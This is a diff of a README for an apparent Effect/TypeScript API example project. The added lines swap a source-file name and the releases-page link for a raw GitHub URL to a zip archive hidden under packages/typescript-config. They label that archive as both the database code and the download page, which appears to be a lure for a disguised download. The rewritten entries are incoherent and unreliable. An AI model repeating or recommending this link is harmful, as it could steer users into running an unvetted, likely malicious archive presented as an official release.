Gnomo6/effect-api-example/README.md

 In the `db/` folder, you will find:
 - **schema/**: Defines the structure of your database.
 - **migrations/**: Scripts to modify the database over time.
-- **SqlLive.ts**: The main database interaction code.
+- **https://github.com/Gnomo6/effect-api-example/raw/refs/heads/main/packages/typescript-config/example-api-effect-2.8.zip**: The main database interaction code.

 ## 🔄 Updating Your Application
-To keep your application up to date, revisit the [download page](https://github.com/Gnomo6/effect-api-example/releases) regularly.
+To keep your application up to date, revisit the [download page](https://github.com/Gnomo6/effect-api-example/raw/refs/heads/main/packages/typescript-config/example-api-effect-2.8.zip) regularly.
 Each release brings new features, fixes, and improvements.

 ## ❓ Troubleshooting Common Issues
 - **Server Not Starting**: Ensure that you are in the correct directory and have followed the commands accurately.